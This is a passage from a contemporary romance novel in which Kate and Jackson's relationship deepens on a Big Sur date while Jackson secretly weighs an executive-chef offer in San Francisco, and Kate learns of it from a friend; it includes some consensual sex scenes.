Kate smiled at her friend's enthusiasm. Then she sighed. "It was... I don't even know how to say it. I don't have the vocabulary for what it was. It was like he broke me into a thousand pieces and then put me back together again. I'm just... " A tear rolled down her cheek and she swiped it away.
"Oh, honey." Gen was alarmed. "You're crying."
Kate laughed.
"But they're happy tears?" Gen ventured.
"I don't even know what they are. I don't even know. My Art Walk event was ruined, I got called a skanky whore, I got physically attacked by Zach's crazy ex-wife, I had revelatory sex—the best sex of my life, or of anyone's life, probably—I threw my father out of my house and told him I'm finished with him. There's just so much _processing_ to do."
Gen sighed and leaned back in her chair. "Wow. The best sex of anybody's life."
"God. You can't know. It really, really was."
"And you're okay?"
"I am," Kate said. "I honestly think I am. I'm better than okay. I'm better than I've been in a long time, maybe ever."
"Where does that leave you and your father?" Gen asked.
Kate shrugged. "I told him we're done. And that makes me sad, because even when someone treats you like crap, you still have hope that someday they'll change, that someday they'll stop treating you like crap and act like a father is supposed to act. And giving up that hope is hard. It hurts. But there's relief, too. And, I'm worried about him. He said he had nowhere to go. That might not have been bullshit."
Gen rubbed Kate's forearm with her hand. "But you can't solve his problems."
"No, I can't. He made them. He has to solve them."
"And where does all of this leave you and Jackson?"
Kate set down her mug on the deck and rubbed at her face with her hands. "Ah, God. I don't know. I thought I'd be able to just have fun with him, you know? Go on some dates, maybe have some good times in bed. Before he moves on. Because he always moves on. But now... "
"Uh oh," Gen said.
"Yeah." Kate laughed at herself. "Uh oh." She looked at Gen. "Do you think he's capable of having a real relationship? I mean, we know his history. Do you think he can handle something real? Does he even want that?"
Gen looked thoughtful. She shrugged. "Ask him."
"He says he wants to give this a shot. Says he wants this to be different from his usual hit-and-run. But even if that's what he wants, will he be able to do it?"
Gen shook her head slowly, considering. "Maybe he's ready. And maybe that's just wishful thinking. But I'll tell you what." She looked intently at Kate. "You never could have done what you did with your father before Jackson."
Kate gave a shaky sigh. "You think?"
"He's... I don't know. He's making you stronger. More confident. He's a good influence."
They sat together in companionable silence, drinking their coffee and watching the hummingbirds hover and flit around the tree right off the deck.
"I'm so jealous right now," Gen said finally.
Kate looked at her. "Jealous?"
"I want this. This aching over a man. This afterglow. This... Just this. Where's _my_ man? I'm thirty-four years old, and I've been looking since I was eighteen. _Where is my man?_ "
"You date," Kate reminded her.
"Yeah, but not like this. I haven't felt"—she gestured toward Kate—"this."
Kate gave Gen a wry smile. "If he crushes me like a tin can, you're not going to be so jealous anymore."
"He won't."
"He might."
Since there was nothing to say to that, no comforting words that would actually be true, Gen reached out and took Kate's hand, and they sat together while the sea lions barked out their early morning greetings.
"What the hell happened at Kate's shop last night?" Daniel demanded. Jackson got the call over his cell phone when he was on his way from his meat supplier back to the restaurant. "I was stuck over at the gallery giving a talk, but the stories... I've heard everything from a wild animal attack to Kate getting beaten up in the street."
Jackson grinned. "Nothing as dire as that."
"Which part?"
"Either." He explained that the wild animal attack was actually a yappy dog and a frightened lemur hiding on top of a cabinet, and that rather than being beaten up, Kate had been accused of shenanigans with someone else's man.
"Hmm. Did she do it?" Daniel inquired.
"No. Well, she went out with him once, and they're friendly."
"I'm thinking the dispute centers on people's varying definitions of the word 'friendly,' " Daniel said.
"Pretty much."
After a pause, Daniel said, "I heard other things, too."
"I don't talk about such things," Jackson said. "I'm a gentleman."
Daniel scoffed. "Since when?"
"Since now. Since today."
"Uh huh. Does this protectiveness mean you're developing real feelings for her?"
Jackson felt uncomfortable with where the conversation was going. He shifted in the driver's seat as he turned on Highway 1 toward town. "I've had real feelings for her for a while now. You know that."
"But now they're _more_ real."
Jackson was silent.
"Look, Jackson," Daniel said. The teasing tone that had been in his voice all through the call was gone. "I've known you for a few years now. This thing you do, with the women, the whole two-weeks-and-goodbye thing, it isn't making you happy, and you know it."
"I'm not the one who says goodbye. It's usually the women who say goodbye."
"Because you choose women you know won't stick around. Don't bullshit me and say you don't."
Jackson, irritated, said nothing.
"My point is," Daniel went on, "you might actually have a shot at some happiness here. Don't screw it up."
"I'm not sure I know how. To not screw it up, I mean."
"You know what to do," Daniel assured him. "You've just never done it."
When Kate got to the store that morning, the residual calamity was worse than she'd remembered. The folding chairs were still out and were in complete disarray, their once tidy rows now gone, with some on their sides and others shoved this way and that while people fled the dog-and-lemur melee. It looked as though the chairs had gotten drunk, and many had passed out.
The refreshment table still bore the cold and dried-up remnants of last night's canapes, and someone had spilled the remains of the iced tea. In the back room, books still littered the floor from where Kate and Jackson had upended them during their passionate abandon. The papers from the file folder that had fallen lay like confetti around her feet.
When she'd returned to the store last night after showing her father the door—or, actually, the pile of crap on the lawn—Fury had already started to clean up, and he'd offered to stay and help her. But he'd had a long day, so she sent him home. She had intended to set things right last night, but so many thoughts and feelings were swirling through her that she gave up and left it.
Now, with morning light streaming through the front windows, she started folding chairs and stacking them against the wall for the rental company to pick up later in the day. When that was done, she threw out the leftover food from the refreshment table. She found a rag in the back room and wiped up the spilled tea.
As she sopped up the tea, the cell phone in her back pocket vibrated, and she pulled it out and looked at it. A text, from Jackson. It said:
_I'm thinking about you._
Kate smiled, and a warmth spread over her skin. She texted back:
_I'm thinking about you, too._
A moment later, another vibration.
_There's been some gossip about us, apparently._
She thought about her response, typed something in, then erased it. Finally, she settled on:
_The best parts are true._
He sent her a smiley face. ☺ Then, this:
_I need to see you again. Soon._
The thought sent a trill of excitement through her body.
_Yes_ , she wrote. Just this. Just, yes. There could be no other answer for him, not now, not when she felt like this.
Kate spent the rest of the day fielding questions about the events of the night before. Rose and Lacy each called, of course, and it seemed that Cambrians from all over town just happened to stop in her store, wanting to chat. Some of the questions she could answer directly—like what happened with the lemur—and others she had to deflect—like what the hell was going on in the back room.
She called Cassidy McLean and apologized, sincerely, for the disaster her appearance had become. Zach called her and apologized, also sincerely, for the way Sherry had accosted her.
By the time Fury came to work, most of the mess had been cleaned up, and the store looked more or less the way it usually did.
"Crazy night," he said, glancing at her quickly and then averting his eyes, a clear giveaway that he'd heard the animal noises coming from the storage area—and not the ones made by the dog and the lemur.
"It certainly was."
"Is Cassidy McLean pissed?"
Kate shrugged. "Oh, I'm sure that wasn't one of the highlights of her career as an author. But she was gracious when I called her on the phone. Samantha's none the worse for wear, apparently. I told her I'd make a donation to the animal refuge."
Fury bobbed his head. "That's nice of you." He was still avoiding her gaze.
"Fury. Look at me." She waited until he did. "We both know what you're thinking about but not mentioning. Could we maybe just pretend that didn't happen, or that you weren't out here listening when it did? Could we just... maintain that fiction for the sake of our work environment, please?"
He grinned and scuffed at the floor with his foot. It was such a childlike gesture coming from him, with his tattoo sleeves and his Goth makeup, that it made her feel an unaccountable affection for him.
"Sure," he said. "We can do that."
"Excellent. Now, Mrs. Singer over on Burton called and said she has some books to trade for store credit, but she can't make it over here because of her mobility issues. Could you run over there and check out what she's got? You know what we need. Don't let her give you her old cookbooks and sewing machine manuals. Because she'll try."
"Got it, boss."
When he was gone, she had time to think about what had happened, and what was to come. She had feelings for Jackson. Back when he'd first come to her house for the cooking lesson, she'd intended this as something casual. A few dates, maybe some easy, fun sex. It would be friendly. Relaxed. A way for her to ease back into dating. She knew Jackson's pattern with women, and she knew that he didn't do long-term. But she liked him, and she was open to some good-natured fun with him.
But all that had changed. It had changed quickly and permanently. It had changed as she'd learned that he loved books; as he'd listened to her—really listened—about her mother, and her father, and her complicated feelings about them; as he'd tried with an endearing earnestness to treat her differently than the other women he'd known; and as he'd touched her and brought her to heights of desire and pleasure she'd never experienced.
Now, she was lost.
There'd be no going back, no reversing course, no way to turn off these feelings, which were real and strong.
That left one problem: Jackson was Jackson. And Jackson didn't do relationships.
He wanted to, she was sure of that. He wasn't setting out to use her or to treat her as disposable. He wanted to try, wanted something more substantial than what he'd had in the past. She believed that. The question was, could he do it? Could he change for her? Wanting something was one thing. Wanting it enough to do what it took to get it was entirely another.
Kate was leaving herself wide open for getting hurt. She knew that. And if she did get hurt this time, if he did decide that he was only cut out for short-term flings, it wasn't something she was going to get over quickly. But she couldn't walk away just to save herself from the risk. Walking away was no longer an option.
She'd just have to let this play itself out. She'd stay open, she'd give herself to him, because it was what her heart was telling her to do. If he didn't prove to be up to the challenge, then she'd just have to deal with those consequences when they came.
# 21
Jackson had already planned Date Five, and it would have been a waste to discard a perfectly good plan just because the climactic finale had already happened. On the Monday following the Art Walk fiasco, Kate would leave Fury in charge of the store, and Jackson planned to pick her up at her house at midmorning for a drive to Big Sur. He'd made lunch reservations at a fine dining restaurant with a breathtaking view of the coast, and then, on the way back to Cambria, they would stop at McWay Falls to take in some scenery. For natural beauty, it was hard to beat Cambria, but if there was any place that could accomplish that, it was Big Sur.
He was just getting ready to leave his apartment on Monday morning to head for Kate's house when his cell phone rang. He snatched it up, hoping it wasn't Kate calling to cancel. It wasn't. The number was one he didn't recognize.
"Jackson Graham," he said, the phone propped between his shoulder and his ear.
"Jackson!" a hearty, enthusiastic voice said. "This is Tucker Elway. We met once, back when you were attending the California Culinary Academy. You probably don't remember."
"Yeah, I remember," Jackson said, interested now. "Don't you own Joie in San Francisco now?" Joie was a highly regarded French restaurant that Jackson had seen on numerous Top Ten lists for the Bay Area.
"That's right, that's right. Have you been in to join us?"
"Not since you took over. I'm down in Cambria."
"Yes. I'm aware. I actually was down there the week before last and had a meal at Neptune."
Jackson's eyes widened. "You did?"
"Yeah, a week ago Sunday." He cited the items he'd ordered—two appetizers, two entrees, and three desserts—and it clicked. Tucker Elway was the guy Jackson had pegged as a food writer.
"That was you? I thought it was a critic. Pulled out all the stops expecting to see something in _Sunset_ magazine."
Elway chuckled good-naturedly. "Yes, well. I wanted to see what you've got without making too much of a fuss about it. I'm looking for a new executive chef for Joie. I've been making the rounds, checking out candidates who interest me. And you interest me."
Jackson clutched the phone and dropped onto his couch. "Executive chef? Who's there now? Isn't it Kerry de Barra?"
"That's right. He's moving to the East Coast to be closer to his family. Plus, I've been wanting to take the food at Joie in a new direction for a while now."
"Huh," Jackson said. "What new direction do you have in mind?"
"I'd like to get you up here to the city to talk about it. Show you the restaurant, talk over some ideas. What do you think?"
What did he think? A year ago, Jackson would have given his left arm and one of his big toes to be executive chef at Joie. It was exactly the kind of opportunity he'd imagined when he'd been toiling away at culinary school, and later, when he'd been gaining experience making salads and plating desserts. But that was before Cambria had worked its charm on him, before it became something that felt suspiciously like home. It was also before Kate. Though he couldn't make life decisions based on a relationship that was only four dates old. Could he?
"Things are pretty busy at Neptune right now," he said, stalling. "It's the summer tourist season."
"Ah, but surely you could get up here for a day. Sometime next week?"
"Let me check my schedule and I'll call you back."
"I'll look forward to it."
Jackson was quiet as he drove up to Big Sur with Kate by his side. He couldn't help it; he had too much going on in his mind. Executive chef at Joie was the big leagues. It was the kind of job he'd dreamed of when he was still in training. Joie was a restaurant that got you written about in glossy magazines, a job that would ensure that everyone in the culinary world would know his name.
That was a double-edged sword, no doubt. They'd know your name if you made amazing food that had customers making reservations a month in advance, but they'd also know your name if you served trite, clichéd entrees that put one in mind of the early bird specials in Boca Raton.
If he hit a rough patch in Cambria, he could regroup and right his course in relative obscurity. At Joie, he'd succeed or fail in the spotlight. That was a lot of pressure.
But more than that, he was thinking about Kate. This was the first time he'd felt excited about a relationship—truly excited—in as long as he could remember. She was smart and beautiful; she was open and kind; she was _real_ in a way the Melanies of the world were not. And the physical chemistry they shared was something he hadn't been prepared for. He'd always loved sex. Hell, who didn't? But what had happened between them on Saturday night had taken the sex he was used to and cranked it up to ten, turned it to full volume, full color, full power. Two days later, he felt like he was still recovering.
He couldn't wait to find out if the lightning strike that had hit them on Saturday was a one-time thing, or if they could replicate it.
If he and Kate had been together for a year, or two years, he could take the job in San Francisco and ask her to go with him. They'd be making the decision together, as a couple. But they were only on Date Five, far too early to consult each other on life decisions. In his experience, relationships didn't last. Women didn't stay. Love was something he heard about from other people.
What if they moved to the city together and it didn't work out between them? She'd be stranded in a place that wasn't her home, her business gone, resenting the hell out of him for upending the life she'd built for herself.
He was about halfway through this train of thought when it hit him like a punch to the gut that he was actually _thinking of taking her with him_. He was thinking long-term, which hadn't happened with any other woman in more than a decade. Not once.
The reality of it left him breathless.
And that made him scared. Terrified. Women always left, and that was fine, because by the time they went he was usually ready for it anyway. But this time? This time, if she left, she was going to burn his world to the ground and leave him a charred, smoking wreck.
And then. And then there was Cambria.
He'd come to love it. He'd come to think of it as home. He felt a peace there that he'd never felt in the Bay Area—or anywhere else, for that matter. He loved the pines and the deer and the crashing surf. He loved the tide pools and the sea lions and the squirrels that scampered over the bluff trails. He loved the wildflowers that carpeted the ground in the spring. He loved the fact that there were no chain restaurants, no drive-ins, no Starbucks. Hell, he even loved the tourists. Most of the time.
But opportunities like this did not come often.
It was only a few hours to the Bay Area by car. Could a long-distance relationship work?
His schedule at Joie would be even more crazy than what he was doing now. But he'd be closer to his parents...
He snapped back into focus. "Hmm? What?"
"Where were you? In your head, I mean. What distant planet were you visiting?"
"Ah," he said, embarrassed. "I'm sorry. I just have a lot going on right now."
"Like what?" She was looking at him, her face earnest and interested.
"Just... something going on at work."
"Nothing bad, I hope."
"No, no. I just have to think about some things, make some decisions. For the restaurant." It wasn't a lie, exactly. If he did go to work at Joie, it would affect Neptune profoundly.
"Okay." There was an edge to her voice that told him she was annoyed that he wasn't talking to her about whatever was on his mind.
But he couldn't yet. Couldn't figure out how.
They headed up the coast past Hearst Castle, past the stretch of beach where elephant seals congregated to nap on the sand and spar with one another, past Ragged Point, with its show-stopping views—and its crowds of tourists.
The day was stunning, with clear skies, cool temperatures, and light breezes. As the road climbed higher and grew more treacherous with its numerous twists and turns, the view improved exponentially. Pines towered to their right, sheer cliffs peered down onto rocky coastline to their left.
He didn't want to be an ass, didn't want to shut down on their date, which was, after all, Date Five, with its promise of earth-shattering sex at the end. So he brought himself back into the present and refocused his attention.
"Have you heard from your father or Angela?" he asked. This could be a poor gambit, given the emotional nature of the subject matter. But it had to be asked.
"Not yet. But I will."
He spared her the briefest glance before putting his eyes back on the road. "You seem pretty sure about that."
"Oh, I am," she said. "We've been through this before. Right now, he's lying low in the hope that I'll cool down and forget what he did. The hope is that I'll feel guilty for treating him that way, then I'll eventually send him some money."
"Does that usually work?"
"It does." She sounded grim. "I'm ashamed to say it, but yeah, it usually does."
"But those other times, you—what?—you had words? Maybe spoke harshly? I doubt you threw his crap out on your lawn."
"That's true."
"So maybe this time, it'll stick."
"We'll see."
They were quiet for a few minutes, and then she said, "Do you know that I'm getting two or three people a day driving by my house, checking it out to see if they want to make an offer? Before I knew what was happening, it was kind of freaking me out. Now I'm just annoyed."
"Zach didn't list it for sale, did he? Wouldn't he need your signature for that?"
She shook her head. "No, he couldn't list it, but he did mention it to his real estate friends. People think they're going to jump on it the minute it goes on the MLS." She let out a harsh breath. "Zach's really sorry, by the way. He had no idea my father was playing him. He's not used to getting the Thomas Bennet treatment the way I am."
"What's up with Zach and Sherry?" Jackson asked. "Did he get that worked out?"
"No, I guess not. She believes him that we weren't involved. But she's still pissed that he was calling me as much as he was."
"Huh," Jackson said.
"Do you think she has a point?" Kate asked.
"About what?"
"I just mean, how would you feel if a woman you were involved with had a close male friend? I'm wondering if Sherry has a legitimate beef, if I crossed a line."
Jackson shrugged and shook his head. "You've got to trust somebody, or there's no point in being with them. You want a guy friend, have guy friends. If you want to turn away from me and toward somebody else, that means I wasn't doing my job in the first place."
"Your job?" There was amusement in her voice.
"Damn right."
"And what exactly do you see as the job description?"
He shot a quick glance at her, saw the smile that played on her lips.
"Keeping you so utterly sexually satisfied that you'll scoff at any other man who's ballsy enough to look at you."
She cleared her throat. "Oh."
It was a job he intended to take seriously.
Lunch in Big Sur was exquisite; at least, Kate thought so. If Jackson disagreed, he kept his opinions to himself. Then again, he probably shared Kate's assessment, considering that he ate everything on his plate.
They split a bottle of wine over their meal, which they ate at a window table with a staggering view of the ocean. Kate felt slightly drunk—a giddy and happy condition—when the waiter brought her dessert, a light-as-air hazelnut cake topped with chocolate ganache.
They talked and ate and held hands and drank—Jackson drank just a little, because he was driving, Kate a bit more—with the blue, churning artistry of nature as their backdrop. By the time their coffee arrived, Kate thought that she'd never had a more enjoyable meal.
"Jackson, thank you so much," she said, her hand resting in his on the table. "This was wonderful."
"It's not over yet," he said. He appraised her with his gaze. "You look happy."
"I am."
"The last couple of times we were together, you cried." His voice held a slight tease. "I like making you happy."
"Hmm." She smiled in a way that made her eyes shine. "Maybe you can make a habit of it."
He picked up her hand and kissed it. "I'd love to try."
He'd promised her the date wasn't over, and so on their way back toward Cambria they stopped at McWay Falls, took the short trail from the parking lot, and watched from the overlook as the eighty-foot waterfall plunged from the cliffs onto the beach below. Kate watched from the railing, and Jackson stood behind her, his arms around her. As she marveled at the beauty of the falls, he tenderly kissed her hair.
From there, they walked back across the parking lot and onto a hiking trail that led them to another, smaller waterfall amid the lush greenery of ferns and towering pines. They made their way down to where the water tumbled over rocks and into a stream that flowed gently toward the ocean.
Kate sat on a piece of a fallen tree and started to take off her shoes and socks. "Come on," she told Jackson. "Let's wade in."
"Nah." He shook his head. "It's probably cold as hell."
She tsked at him. "I thought you were tougher than that."
"Bait me all you want. It's not gonna work." He sat on the log beside her, his shoes and socks still firmly on his feet.
She stepped into the water, onto the slippery rocks at the bottom of the stream, and gasped with the cold. "Oh my God! It's like ice!"
"Told you," he said smugly.
"It's refreshing," she taunted. "You'll like it."
"I don't think so."
"Here. I'll show you." Impulsively, she bent down, filled her hands with the bracingly cold water, and flung it at him.
He looked at her in shock, water dripping from his hair, from his face. "I can't believe you did that."
She covered her mouth with her hands and giggled. The giggle turned to a shriek when he came at her, dashing into the water with his shoes still on, scooping up big handfuls of icy water and tossing them at her.
They splashed each other, running through the water and playing like a couple of kids, until he reached out and grabbed her, her foot slipped on the slick stream bed, and they both tumbled headlong into the water.
The cold left Kate shocked and trembling as she lay in the shallow stream, water up to her shoulders, Jackson lying on top of her, holding her in his arms.
"You're shivering," he said, his mouth inches from hers.
"Cold," she said. Then all thoughts of discomfort vanished as his mouth covered hers, sending torrents of heat through her veins.
She clutched at him, wrapped herself around him as he kissed her, not the frantic kiss of desperation they'd shared in the back room of the store on Saturday night, but a kiss that was more deliberate, more intentional; she felt the depth of meaning in this kiss, and her body responded to it.
"Oh," she said.
He dripped onto her from above, holding her, looking into her face. Her breath was heightened from the play, the cold, the passion of the kiss.
"We should probably get out of the water," he said at last, his voice rough.
Her legs felt weak as he got up from on top of her and helped her up. They climbed out of the stream and onto dry land, and he grinned at her. "You look half drowned." He wiped some water from her face with his hand.
She pushed at him playfully. "You should have just gone in when I asked you to."
"That'll teach me."
"I would hope so."
She held his gaze, and felt magic. Pure, giddy happiness, and tenderness, and something else that might have been love.
# 22
The drive back to Cambria was long, and by the time they got there, they could barely keep their hands off each other. There was a quick discussion of where they should go—his place or hers. Kate suggested his, because it was marginally closer. But Jackson pointed out that being one floor above his place of work meant a high likelihood of interruption. That settled it. He drove—maybe a little too fast due to a sense of urgency—down Ardath Drive to her house at Marine Terrace.
He parked on the street, and they hurried to the front door, his wet shoes making a squishing noise with every step.
"Let me just... " In her hurry, she had a hard time getting her key into the lock, so he took it from her and opened the door.
"Is Gen downstairs?" he asked. She understood the question. There might be noise.
They started stripping off their clothes as soon as they got the door closed, and by the time they reached her bedroom, they'd left a trail of wet garments leading from the front door, through the living room, and into her room. Fully nude, she fell onto the bed, and he lowered himself on top of her. She'd been cold in her wet things, but his body was hot, and she devoured him with her mouth, with her hands.
He smelled like stream water and sunshine.
Poised above her, he looked down into her face. "This. This thing with us," he whispered. "This is... "
She nodded. The way he looked at her told her what he was trying to say.
Now, with the afternoon and evening stretching before them, they took the time to explore each other with their hands, their mouths, feeling, tasting, memorizing the landscape of each other's bodies.
He told her to lie still, and she stretched out like a cat in a sunbeam while he ran his tongue and his fingertips over her throat, her breasts, her belly, her legs. Her skin quivered with need in the wake of each feathery touch. He rose up her thighs and came to rest between them, tasting and touching. The tension rose and grew until she arched her back and cried out.
Sated for now, she turned her attention to him, learning his body the way he'd learned hers. She surprised herself with her own boldness after all this time, this interminable time of loneliness. She used her mouth on him, and he held his hands in her hair.
When he could no longer endure the wait, he rolled her onto her back. He finally, finally penetrated her, and she gasped with pleasure, with satisfaction. She was overwhelmed, overjoyed, and a tear slid down her cheek.
"Crying again," he murmured.
He kissed the salty path of her tears.
Afterward, they lay together beneath the covers in the late afternoon light that streamed through the windows.
"Date Five was awesome," Kate said. "I love Date Five. We should just do Date Five over and over again."
Jackson gave a low laugh and pressed a kiss to her temple. "Works for me."
"Hey," she said after a while.
"What was it that you didn't want to talk about earlier? When we were driving up to Big Sur? You were preoccupied, but you didn't tell me what it was about." She snuggled into his arms.
"Just a work thing."
She looked up into his face. "But it's not _just_ a work thing, is it?"
He was quiet for a while. Then: "What makes you say that?"
"Because you seem worried about it—whatever it is."
"I'm not," he said.
"But if you... "
He silenced her words with his kisses.
They took a shower together, and after that, they ordered a pizza and sat out on her deck drinking beer from bottles and waiting for the food to arrive. Jackson's wet clothes were in the washing machine, and he'd tried without success to find something in Kate's house that he could wear until they were ready. Her bathrobe was too small for him, as were her sweatpants. So he lounged on the deck with a tablecloth wrapped around his waist. He'd considered using just a towel, but the relative lack of coverage made him worry about the view from the street below.
By now, it was early evening and the sky was beginning to show its first tinges of pink and orange.
The pizza came. Kate tried to pay for it, but Jackson insisted that he was the Date Five host, and that meant he would pay the pizza guy, even if they were in Kate's house. He scurried around the house in his tablecloth, looking for the wet wallet he'd pulled out of his pants before putting them in the washer.
He paid the pizza guy with a twenty that was still soggy, and they went back onto the deck and ate the pepperoni, sausage, and black olive pizza straight from the box.
"God, you look good in a tablecloth," she said as she munched on a slice of pizza. "You should wear that all the time."
"Maybe I will. Though there could be safety issues at the restaurant."
They heard rapid footsteps coming down the stairs on the side of the house. A moment later, Gen's voice said, "Hey, Kate, are you... ?" Gen stepped out onto the lawn under the deck and peered up. When she saw Jackson in his tablecloth, her eyes widened.
"Gen." Jackson saluted her with the piece of pizza in his hand.
"Hi, Jackson. I'll just... I'll see you guys later." She popped back under the deck with a big grin on her face.
"She'll want to talk about this later," Kate said.
Jackson nodded. "I'm sure she will. When you speak of me, speak well."
The next few days passed in a blur of bliss for Kate. Jackson's schedule at the restaurant was brutal, but they talked on the phone often, supplemented with texts and emails. He left the restaurant late every night, but that didn't stop him from dropping by Kate's house a few times after work to make love to her and sleep in her bed.
Kate was looking forward to his next night off so they could have a proper date, even if it was just a lazy night in eating takeout and watching Netflix. So she was surprised—but neither upset nor concerned—when he told her he had to go to the Bay Area the following Monday to visit his parents. He'd be there overnight, returning Tuesday.
"Is everything okay with them?" Kate asked when he told her of his plans over the phone.
"Yeah, yeah. I just haven't been there for a while. My mom is laying the guilt on me whenever I talk to her. 'Jackson? Do I know a Jackson? I seem to vaguely remember that name.' That kind of bullshit."
Kate laughed. "Right. I get it. Well, have a safe drive. I'll see you when you get back."
"I'm counting on it," he said.
There was something in his voice, though. She knew he wasn't telling her everything, but she tried not to worry about it.
Jackson did visit his parents on his trip to the Bay Area. In fact, he spent that night in his old room, sleeping on a futon now that his mother had removed his twin bed and his hockey posters and had brought in her sewing machine and scrapbooking supplies. But he also visited Tucker Elway at Joie.
Elway ushered Jackson through the restaurant, which was sleek with copper-plated ceilings, pale blue walls, and white tuxedo-style banquettes providing seating for blond wood tables. Here and there, small circular café tables were surrounded by high-backed chairs upholstered in purple velvet.
"Wow," Jackson said as they walked through the dining room, which was twice the size of the one at Neptune. The effect of the purple velvet might have been tacky or ostentatious, but instead the pop of color made the place look current and hip. It was midafternoon, so the dining room wasn't full, but neither was it empty. Three couples and two groups of women appeared to be enjoying drinks and appetizers.
"I'm pleased that you like it," Elway said. He was an older, white-haired man dressed entirely in black: black jeans, black T-shirt, black belt, black loafers. His haircut had probably cost more than Jackson's TV, and Jackson suspected that Elway got his eyebrows waxed. San Francisco was a different world than what he'd grown used to in Cambria. "Let's just take a look at the kitchen."
They went through the swinging door into the kitchen, and Jackson stopped, stunned. This kitchen was everything Gavin Hughes, the owner at Neptune, would have provided if he could afford it. The gleaming stainless steel surfaces; the top-quality appliances; the large space that allowed for a level of organization unheard of at Neptune. Only a few kitchen staff were on duty at this time of day, because of the light demand, but the ones who were there worked with efficiency and expertise.
Elway showed Jackson around, introduced him to the kitchen staff, and then ushered him back into an office resplendent with hardwood floors, natural light, and a highly polished mahogany desk.
"Have a seat." Elway indicated his visitor chair—one of the high-backed purple numbers Jackson had seen in the dining room. "Can I get you anything? Coffee?"
Jackson accepted the coffee, and when he was comfortably sipping its enviable richness—this was, undeniably, better than the coffee at Neptune—Elway launched into his pitch.
"I'd like you to rework our menu. What we've got is good—it's gotten us this far—but it's not as fresh or interesting as I'd like. Joie is still a place you come to enjoy a fantastic meal, but it used to be a place you talked about. There was a prestige. Who's been there, who hasn't, what did you have to do to get a table, who was there when you went. That sort of thing. We haven't had that in a while. I want to get it back."
Jackson found himself nodding. "Right. But you don't want to go so avant-garde that the food is a curiosity rather than a meal. People still have to want to eat it."
"Exactly. I'd love to hear your ideas."
They talked about concepts, themes, the practicalities of sourcing ingredients. Jackson forgot he was interviewing for a job. When he talked about food, he became absorbed and animated, and nothing else mattered. Elway pulled out a copy of the current menu, and they went over it item by item, discussing the good, the very good, and the outdated.
"So, when can you start?" Elway said at last, leaning back in his chair.
"I... What?" Jackson was caught off guard.
"Here's the salary I can offer you." Elway wrote a figure on a piece of note paper and slid it across the table. Jackson took a peek, and his heart did a little stutter. He was sure there had to be one too many zeroes here.
"That's not as high as it seems," Elway said. "The rents here are astronomical."
"I know. I grew up in the Bay Area."
"That's right," Elway said. "So you'd be coming home."
_Home._ Interesting word. He once would have considered this to be home, but now he wasn't so sure.
"I'm going to have to think about it," he said. "How soon would you need to know?"
"I can give you a few days," Elway said. "But after that I'm going to have to move on. I've got to get this job filled."
"I understand."
They shook hands, and Jackson went out to his truck, stunned at the memory of the dream kitchen and the figure written in black ink on a small, white piece of paper.
"So? How did it go?"
Jackson sat at the kitchen table of his childhood home with his mother. His father sat in a reclining chair in the living room, watching a baseball game and occasionally yelling at the screen.
Claire Graham, a woman in her fifties who, in earlier times, would have been described as handsome, had just come home from her shift at the hospital, and she looked dead tired as she sipped a cup of tea across from Jackson. Her reddish-brown hair was streaked with grey, and it was pinned up on top of her head to keep it out of her way. A large woman—fit, but with big bone structure—she'd come off as a formidable force when Jackson was younger. She still did.
"He's offering me a lot of money." Jackson, rather than drinking tea, held a squat glass with two fingers of Scotch on ice. He took a sip. The kitchen hadn't been updated since his childhood, and the vinyl flooring and Formica made him nostalgic for his youth.
"Takes a lot of money to live in San Francisco."
"It does." He looked into his glass, rattled the ice around a bit. "Beautiful restaurant. You should see the kitchen."
"I'll bet," she said.
After a while, he said, "Elway wants me to create a new menu."
"Having control over the menu in a place like that? It's the kind of thing you've always wanted to do."
"It is."
"THAT WAS A STRIKE, YOU WORTHLESS BASTARD!" Jackson's father yelled at the screen in the next room.
"Oh, for God's sake, Bill, quiet down. We're trying to talk!" Claire called to him. She turned to Jackson. "Sounds like an incredible opportunity."
He nodded. "It really does."
She reached out and put her hand on his arm. "Then why does it feel more like your dog died? What in the world is bothering you, Jackson?"
He looked at the hand on his arm, at the Scotch in his glass. He shrugged. "I'm not sure."
She put a hand under his chin and tipped his face up so he would look at her. "You're a poor liar, Jackson Graham. Always were."
He grinned. "Okay. There's this girl. Woman. In Cambria."
She scoffed. "Isn't there always a girl in Cambria?"
"This one's different," Jackson told his mother.
"Uh oh," she said.
"Why? Is that a bad thing?"
She shook her head. "No. Not at all. But it's a new thing for you, and I'm wondering if you're ready for it."
"I am, too." He drank some more of the Scotch and felt its warmth seep into him. "If I take the job, I can be closer to you and Dad."
"Don't," she said. The vehemence in her voice startled him.
"Don't what?"
"Don't use me and your father as an excuse to run away from this woman in Cambria because you're scared you might be in love. We're not exactly in our dotage. We'll get along here on our own, just like we have for the last few years."
"I wasn't doing that."
"Like hell you weren't." She gave him the look he remembered from his childhood, the one that said she knew what he'd been up to, and she was having none of it. "The idea of a real relationship—the idea of love—might be frightening for you, Jackson, but it's time you faced that fear, don't you think?"
"RUN! RUN, YOU... THAT'S IT, RUN!" Bill said. "AH, FOR THE... HE WAS SAFE!"
"If I give this up, and she doesn't stay... "
"Then at least you'll know you tried," Claire said. "You'll know you weren't the one to walk out."
"Yeah," he said, nodding. "Yeah."
# 23
Before Jackson had left for the Bay Area, he had talked to Ryan. Then, over beers at Ted's, Ryan talked to Daniel. And then, during a visit to the gallery to check on an installation, Daniel talked to Gen. Before Jackson even got into his truck to head back south to Cambria, knowledge of the real reason for his trip had filtered through town to just about everyone—except Kate.
On the phone with Kate on that Monday, toward the end of the workday, Gen had concern in her voice as she asked, "So, how are you doing?"
"I'm good," Kate said, upbeat and perky.
"Really?" Gen asked doubtfully.
"Sure. Why wouldn't I be?"
"Well, I thought you'd be worried about what Jackson's going to do."
"Do about what?"
And that's when the conversation took a turn. "Oh. Shit. Nothing," Gen said. "I... Nothing."
"Genevieve," Kate said. "What the hell are you talking about?"
"Oh, Jesus," Gen said.
Kate's pulse started to thump as a feeling of dread spread through her. "What do you know that I don't? What is Jackson doing in the Bay Area? Is he even in the Bay Area? He said he was visiting his parents." She felt herself gripping the bookstore counter with her free hand until the pointed corner jabbed into her palm.
"Yeah, he really is up there."
"But he's not just visiting his parents."
"Um... no." Gen sounded miserable, as though she were near tears.
"I swear to God," Kate said, "if you don't tell me right now, I'll... "
"He's got a job interview. I'm so sorry. I thought you knew."
Kate's first reaction was relief, because she'd thought Gen was going to say he was up there with another woman. His past might have suggested such a thing. But when the reality of it hit—he was at a job interview, for a position more than two hundred miles away—the breath went out of her, and she had to sit down.
"What?" Her voice was barely more than a whisper.
